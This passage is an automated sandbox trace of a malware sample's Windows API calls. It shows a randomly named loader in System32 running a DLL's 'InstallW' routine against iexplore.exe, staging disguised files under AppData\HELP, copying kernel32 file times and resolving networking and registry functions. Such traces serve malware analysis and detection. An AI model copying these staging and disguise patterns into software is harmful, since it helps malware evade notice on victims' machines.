SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.038] SetLastError (dwErrCode=0x0) [0036.038] GetLastError () returned 0x0 [0036.039] SetLastError (dwErrCode=0x0) [0036.039] GetLastError () returned 0x0 [0036.039] SetLastError (dwErrCode=0x0) [0036.039] GetLastError () returned 0x0 [0036.039] SetLastError (dwErrCode=0x0) [0036.039] GetLastError () returned 0x0 [0036.039] SetLastError (dwErrCode=0x0) [0036.039] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0036.039] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0036.039] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0036.040] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f4e0 | out: lpSystemTimeAsFileTime=0x18f4e0*(dwLowDateTime=0xe32b30b0, dwHighDateTime=0x1d3dfba)) [0036.041] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f418, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.041] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f300, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetLastError () returned 0x0 [0036.041] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.041] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0036.041] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.041] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.041] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.041] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.041] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0036.042] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0036.042] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0036.042] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0036.042] GetLastError () returned 0xb7 [0036.042] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.042] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0036.042] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0036.042] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0036.042] wsprintfA (in: param_1=0x18f180, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.042] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0036.042] wsprintfA (in: param_1=0x18f07c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.042] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.042] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0036.042] CloseHandle (hObject=0x74) returned 1 [0036.042] GetLastError () returned 0x0 [0036.042] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0036.042] GetLastError () returned 0x0 [0036.042] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0036.043] GetSystemDirectoryA (in: lpBuffer=0x18f180, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.043] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.043] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0036.043] CloseHandle (hObject=0x74) returned 1 [0036.043] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.043] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.043] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0036.044] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0036.044] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0036.044] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0036.045] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0036.045] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0036.045] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0036.045] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0036.045] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0036.046] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0036.047] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0036.047] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0036.047] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0036.047] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0036.047] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0036.047] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0036.047] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0036.048] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0036.048] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.048] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.048] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.048] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0036.048] Entry () [0036.048] GetMessageA (lpMsg=0x18f804, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 143 os_tid = 0xdc0 [0036.544] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.544] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.545] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.545] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.545] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.545] GetCurrentThreadId () returned 0xdc0 Process: id = "65" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f380" os_pid = "0xd98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"iexplore.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2834 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2835 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2836 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2837 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2838 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2839 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2840 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2841 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2842 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2843 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2844 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2845 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2846 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2847 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 2848 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2849 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2850 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2851 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2852 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2853 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2854 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2855 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2856 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2857 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2858 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2859 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2860 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 2861 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2862 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2863 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2864 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2865 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 2866 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2867 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2868 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2869 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2870 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2871 start_va = 0x210000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2872 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2873 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2874 start_va = 0x1200000 end_va = 0x129ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Thread: id = 136 os_tid = 0xd9c [0036.080] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f424 | out: lpSystemTimeAsFileTime=0x16f424*(dwLowDateTime=0xe32ff370, dwHighDateTime=0x1d3dfba)) [0036.080] GetCurrentProcessId () returned 0xd98 [0036.080] GetCurrentThreadId () returned 0xd9c [0036.080] GetTickCount () returned 0x18239 [0036.080] QueryPerformanceCounter (in: lpPerformanceCount=0x16f41c | out: lpPerformanceCount=0x16f41c*=376619381) returned 1 [0036.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.081] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0036.081] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0036.081] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0036.081] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0036.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.081] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.081] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.081] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.081] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.081] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.082] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.082] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.082] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.082] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.082] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.082] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.083] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.083] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.083] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.083] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.083] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.083] GetCurrentThreadId () returned 0xd9c [0036.083] GetCommandLineA () 